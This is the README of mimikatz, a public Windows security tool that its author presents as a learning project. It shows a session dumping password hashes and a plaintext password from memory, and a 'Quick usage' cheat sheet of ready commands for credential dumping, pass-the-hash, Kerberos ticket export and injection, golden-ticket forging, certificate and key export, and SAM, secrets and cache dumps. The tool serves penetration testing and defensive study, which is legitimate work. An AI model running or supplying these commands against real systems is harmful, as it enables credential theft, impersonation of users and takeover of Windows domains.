A little tool to play with Windows security
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README.md

mimikatz

mimikatz is a tool I've made to learn C and make somes experiments with Windows security.

It's now well known to extract plaintexts passwords, hash, PIN code and kerberos tickets from memory. mimikatz can also perform pass-the-hash, pass-the-ticket or build Golden tickets.

  .#####.   mimikatz 2.0 alpha (x86) release "Kiwi en C" (Apr  6 2014 22:02:03)
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mimikatz # privilege::debug
Privilege '20' OK
 
mimikatz # sekurlsa::logonpasswords
 
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

But that's not all! Crypto, Terminal Server, Events, ... lots of informations in the GitHub Wiki https://github.com/gentilkiwi/mimikatz/wiki or on http://blog.gentilkiwi.com (in French, yes).

If you don't want to build it, binaries are availables on https://github.com/gentilkiwi/mimikatz/releases

Quick usage

log
privilege::debug

sekurlsa

sekurlsa::logonpasswords
sekurlsa::tickets /export

sekurlsa::pth /user:Administrateur /domain:winxp /ntlm:f193d757b4d487ab7e5a3743f038f713 /run:cmd

kerberos

kerberos::list /export
kerberos::ptt c:\chocolate.kirbi

kerberos::golden /admin:administrateur /domain:chocolate.local /sid:S-1-5-21-130452501-2365100805-3685010670 /krbtgt:310b643c5316c8c3c70a10cfb17e2e31 /ticket:chocolate.kirbi

crypto

crypto::capi
crypto::cng

crypto::certificates /export
crypto::certificates /export /systemstore:CERT_SYSTEM_STORE_LOCAL_MACHINE

crypto::keys /export
crypto::keys /machine /export

vault & lsadump

vault::cred
vault::list

token::elevate
vault::cred
vault::list
lsadump::sam
lsadump::secrets
lsadump::cache
token::revert

Build

mimikatz is in the form of a Visual Studio Solution and a WinDDK driver (optional for main operations), so prerequisites are:

mimikatz uses SVN for source control, but is now available with GIT too! You can use any tools you want to sync, even incorporated GIT in Visual Studio 2013 =)

Synchronize!

  • GIT URL is : https://github.com/gentilkiwi/mimikatz.git
  • SVN URL is : https://github.com/gentilkiwi/mimikatz/trunk

Build the solution

  • After opening the solution, Build / Build Solution (you can change architecture)
  • mimikatz is now built and ready to be used! (Win32 / x64)

ddk2003

With this optional MSBuild platform, you can use the WinDDK build tools, and the default msvcrt runtime (smaller binaries, no dependencies)

For this optional platform, Windows Driver Kit 7.1 (WinDDK) - http://www.microsoft.com/download/details.aspx?id=11800 and Visual Studio 2010 are mandatory, even if you plan to use Visual Studio 2012 or 2013 after.

Follow instructions:

Licence

CC BY 3.0 FR licence - http://creativecommons.org/licenses/by/3.0/fr/

Author

Benjamin DELPY gentilkiwi, you can contact me on Twitter ( @gentilkiwi ) or by mail ( benjamin [at] gentilkiwi.com )

This is a personal developpement, please respect its philosophy and don't use it for bad things!